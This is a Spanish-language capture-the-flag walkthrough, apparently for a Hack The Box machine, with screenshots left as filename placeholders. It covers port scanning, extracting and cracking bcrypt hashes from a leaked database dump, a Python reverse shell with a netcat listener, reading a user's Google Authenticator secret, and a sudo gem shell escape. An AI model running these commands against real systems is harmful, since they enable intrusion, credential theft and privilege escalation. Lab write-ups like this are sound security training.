nmap -A -p- -oA jewel 10.129.130.0 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA jewel 10.129.130.0

nmap -sU -O -p- -oA jewel-udp 10.129.130.0

nikto -h 10.129.130.0:80

Pasted image 20220416074552.png

Pasted image 20220416074608.png

whatweb http://10.129.130.0/8000

whatweb http://10.129.130.0:8080

Pasted image 20220416074712.png

Nos dirigimos http://10.129.130.0:8080

Pasted image 20220416074825.png

Nos dirigimos a http://10.129.130.0:8000/gitweb

Pasted image 20220416074849.png

echo "10.129.130.0 mail.htb" | sudo tee -a /etc/hosts

Pasted image 20220416075254.png

Bajamos el archivo tar.gz

Pasted image 20220416075356.png

tar -xf git-5d6f436.tar.gz

Pasted image 20220416075814.png

cd git-5d6f436

cat bd.sql | grep -E -i "user|pass|key" -C 2 | grep -E "bill|jennifer"

Pasted image 20220416080034.png

cat bd.sql | grep -E -i "user|pass|key" -C 2 | grep -E "bill|jennifer" | awk '{print $2 ":" $8}'

Pasted image 20220416080240.png

https://github.com/mxrch/penglab

https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb

Cambiamos hashcat y rockyou con un valor de True

Pasted image 20220416080929.png

Runtime->change Runtime type

Pasted image 20220416081112.png

Agregamos el mode y los hashes al codigo

Pasted image 20220416081745.png

hashcat -m 3200 -a 0 hashes /usr/share/wordlists/rockyou

El password es spongebob

Pasted image 20220416140057.png

Nos registramos como un usuario nuevo

Pasted image 20220416094303.png

Creamos el siguiente codigo y lo corremos

Pasted image 20220416102945.png Pasted image 20220416103027.png

python3 rev.py 10.129.130.0 10.10.14.82 1234

nc -lvnp 1234

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Pasted image 20220416115643.png

cd /home/bill

cat .google_authenticator

Pasted image 20220416120018.png

https://addons.mozilla.org/en-US/firefox/addon/auth-helper/

Hacer click en Edit > New > Manual Entry y pone como issuer cualquier cosa y como codigo 2UQI3R52WFCLE6JTLDCSJYMJH4

El autenticador le genera un numero: En mi caso fue 444791 que se pone como Verification Code despues de usar spongebob como password

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

Pasted image 20220416121341.png

boxes

copyright©2022 Cu3rv0x all rights reserved